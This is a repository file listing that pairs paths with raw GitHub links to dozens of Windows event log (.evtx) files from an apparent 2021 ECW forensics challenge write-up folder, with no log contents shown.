https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Crypto-DPAPI%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Crypto-DPAPI%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-DeviceSetupManager%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-DeviceSetupManager%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-DeviceSetupManager%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-DeviceSetupManager%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Dhcp-Client%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Dhcp-Client%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Dhcpv6-Client%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Dhcpv6-Client%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Diagnosis-DPS%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Diagnosis-DPS%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Diagnostics-Performance%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Diagnostics-Performance%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-FileHistory-Core%4WHC.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-FileHistory-Core%4WHC.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-GroupPolicy%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-GroupPolicy%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-HelloForBusiness%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-HelloForBusiness%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-HotspotAuth%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-HotspotAuth%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-International%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-International%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-Boot%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-Boot%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-EventTracing%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-EventTracing%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-PnP%4Configuration.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-PnP%4Configuration.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-WHEA%4Errors.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-WHEA%4Errors.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-WHEA%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Kernel-WHEA%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Known Folders API Service.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Known Folders API Service.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-LanguagePackSetup%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-LanguagePackSetup%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-LiveId%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-LiveId%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-MUI%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-MUI%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-MUI%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-MUI%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-NCSI%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-NCSI%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-NetworkProfile%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-NetworkProfile%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Ntfs%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Ntfs%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Ntfs%4WHC.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Ntfs%4WHC.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Partition%4Diagnostic.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Partition%4Diagnostic.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-PowerShell%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-PowerShell%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-PowerShell%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-PowerShell%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-PushNotification-Platform%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-PushNotification-Platform%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-PushNotification-Platform%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-PushNotification-Platform%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-ReadyBoost%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-ReadyBoost%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-RestartManager%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-RestartManager%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SMBClient%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SMBClient%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Audit.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Audit.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Connectivity.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Connectivity.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Security.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SMBServer%4Security.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Security-Mitigations%4KernelMode.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Security-Mitigations%4KernelMode.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Security-Mitigations%4UserMode.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Security-Mitigations%4UserMode.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SettingSync%4Debug.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SettingSync%4Debug.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SettingSync%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SettingSync%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4ActionCenter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4ActionCenter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4AppDefaults.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4AppDefaults.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Shell-Core%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Audit.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Audit.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Connectivity.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Connectivity.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Security.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-SmbClient%4Security.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-StateRepository%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-StateRepository%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-StateRepository%4Restricted.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-StateRepository%4Restricted.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Storage-ClassPnP%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Storage-ClassPnP%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Storage-Storport%4Health.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Storage-Storport%4Health.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Storage-Storport%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Storage-Storport%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Store%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Store%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Storsvc%4Diagnostic.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Storsvc%4Diagnostic.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-TWinUI%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-TWinUI%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-TaskScheduler%4Maintenance.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-TaskScheduler%4Maintenance.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Time-Service%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Time-Service%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-User Device Registration%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-User Device Registration%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-User Profile Service%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-User Profile Service%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-UserPnp%4ActionCenter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-UserPnp%4ActionCenter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-UserPnp%4DeviceInstall.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-UserPnp%4DeviceInstall.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx -------------------------------------------------------------------------------- 